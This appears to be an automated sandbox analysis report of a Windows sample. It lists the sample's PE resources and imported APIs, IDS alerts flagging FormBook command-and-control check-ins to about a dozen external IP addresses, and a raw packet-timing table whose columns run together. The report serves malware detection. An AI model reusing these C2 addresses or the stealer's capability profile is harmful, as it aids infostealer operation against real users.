RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T16:23:49.467410+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49757 | 3.33.130.190 | 80 | TCP
2024-12-10T16:23:49.467410+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49757 | 3.33.130.190 | 80 | TCP
2024-12-10T16:24:01.517330+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49796 | 180.178.39.236 | 80 | TCP
2024-12-10T16:24:04.236517+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49802 | 180.178.39.236 | 80 | TCP
2024-12-10T16:24:06.935287+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49808 | 180.178.39.236 | 80 | TCP
2024-12-10T16:24:09.611947+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49816 | 180.178.39.236 | 80 | TCP
2024-12-10T16:24:09.611947+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49816 | 180.178.39.236 | 80 | TCP
2024-12-10T16:24:16.446620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49833 | 203.161.49.193 | 80 | TCP
2024-12-10T16:24:19.126391+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49839 | 203.161.49.193 | 80 | TCP
2024-12-10T16:24:21.845643+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49845 | 203.161.49.193 | 80 | TCP
2024-12-10T16:24:24.436750+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49854 | 203.161.49.193 | 80 | TCP
2024-12-10T16:24:24.436750+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49854 | 203.161.49.193 | 80 | TCP
2024-12-10T16:24:31.925227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49872 | 217.160.0.132 | 80 | TCP
2024-12-10T16:24:34.584290+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49878 | 217.160.0.132 | 80 | TCP
2024-12-10T16:24:37.361408+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49884 | 217.160.0.132 | 80 | TCP
2024-12-10T16:24:39.938824+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49894 | 217.160.0.132 | 80 | TCP
2024-12-10T16:24:39.938824+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49894 | 217.160.0.132 | 80 | TCP
2024-12-10T16:24:47.192472+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49911 | 216.40.34.41 | 80 | TCP
2024-12-10T16:24:49.853751+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49917 | 216.40.34.41 | 80 | TCP
2024-12-10T16:24:52.581039+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49923 | 216.40.34.41 | 80 | TCP
2024-12-10T16:24:55.167018+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49934 | 216.40.34.41 | 80 | TCP
2024-12-10T16:24:55.167018+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49934 | 216.40.34.41 | 80 | TCP
2024-12-10T16:25:02.442109+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49945 | 3.33.130.190 | 80 | TCP
2024-12-10T16:25:04.697169+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49955 | 3.33.130.190 | 80 | TCP
2024-12-10T16:25:07.348123+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49961 | 3.33.130.190 | 80 | TCP
2024-12-10T16:25:19.189090+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49968 | 3.33.130.190 | 80 | TCP
2024-12-10T16:25:19.189090+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49968 | 3.33.130.190 | 80 | TCP
2024-12-10T16:25:26.302171+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49995 | 46.38.243.234 | 80 | TCP
2024-12-10T16:25:28.958390+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 46.38.243.234 | 80 | TCP
2024-12-10T16:25:31.613836+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 46.38.243.234 | 80 | TCP
2024-12-10T16:25:40.784275+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49998 | 46.38.243.234 | 80 | TCP
2024-12-10T16:25:40.784275+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49998 | 46.38.243.234 | 80 | TCP
2024-12-10T16:25:48.568365+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49999 | 74.48.34.43 | 80 | TCP
2024-12-10T16:25:51.223207+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50000 | 74.48.34.43 | 80 | TCP
2024-12-10T16:25:53.879832+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 74.48.34.43 | 80 | TCP
2024-12-10T16:25:56.550295+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50002 | 74.48.34.43 | 80 | TCP
2024-12-10T16:25:56.550295+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50002 | 74.48.34.43 | 80 | TCP
2024-12-10T16:26:04.340359+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 23.167.152.41 | 80 | TCP
2024-12-10T16:26:06.996278+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 23.167.152.41 | 80 | TCP
2024-12-10T16:26:09.658023+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 23.167.152.41 | 80 | TCP
2024-12-10T16:26:12.510591+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50006 | 23.167.152.41 | 80 | TCP
2024-12-10T16:26:12.510591+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50006 | 23.167.152.41 | 80 | TCP
2024-12-10T16:26:19.926376+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 178.79.184.196 | 80 | TCP
2024-12-10T16:26:22.600329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 178.79.184.196 | 80 | TCP
2024-12-10T16:26:25.254544+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 178.79.184.196 | 80 | TCP
2024-12-10T16:26:32.876349+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50010 | 178.79.184.196 | 80 | TCP
2024-12-10T16:26:32.876349+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50010 | 178.79.184.196 | 80 | TCP
2024-12-10T16:26:40.406312+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 45.79.252.94 | 80 | TCP
2024-12-10T16:26:43.018497+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 45.79.252.94 | 80 | TCP
2024-12-10T16:26:45.676025+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 45.79.252.94 | 80 | TCP
2024-12-10T16:26:48.335378+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50014 | 45.79.252.94 | 80 | TCP
2024-12-10T16:26:48.335378+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50014 | 45.79.252.94 | 80 | TCP
2024-12-10T16:27:03.926117+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 31.31.198.145 | 80 | TCP
2024-12-10T16:27:07.551628+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50016 | 31.31.198.145 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Dec 10, 2024 16:24:47.388067961 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.389267921 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.389355898 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.566924095 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.585500002 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.704879999 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:48.704996109 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.716372013 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.835966110 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853225946 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853595018 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853606939 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853750944 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.854933023 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.854944944 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.855151892 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.857290030 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.857301950 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.857378006 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.859184980 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.859204054 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.859304905 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.861547947 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.861643076 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.973323107 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.973762989 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.973834038 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.977407932 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.019942999 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:50.045284033 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.045783997 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.045847893 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:50.049329996 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.050548077 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.050879002 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:50.223110914 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.242950916 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.362663984 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:51.362746000 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.378676891 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.500056028 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:51.500087976 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.580269098 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.580873966 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.580885887 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.581038952 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.583044052 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.583056927 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.585361958 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.585374117 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.585562944 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.587795019 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.587806940 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.590200901 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.590471983 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.594161034 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.704040051 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.704963923 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.706207037 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.773725986 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.776273012 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.776330948 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.777674913 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.777686119 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.777735949 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.781819105 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.781898022 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.896323919 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:53.913645983 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:54.033539057 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:54.037209988 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:54.044536114 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:54.165134907 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.166249990 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.166932106 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.166944027 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.167017937 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.169370890 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.169384003 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.169409037 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.171355009 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.171366930 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.171407938 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.175462008 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.295464039 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:25:00.689793110 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:00.913428068 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:00.913500071 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:00.930907011 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:01.050132990 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:02.442109108 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:02.610971928 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:03.461167097 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:03.586097002 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:03.586196899 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:03.597537041 CET4995580192.168.2.53.33.130.190
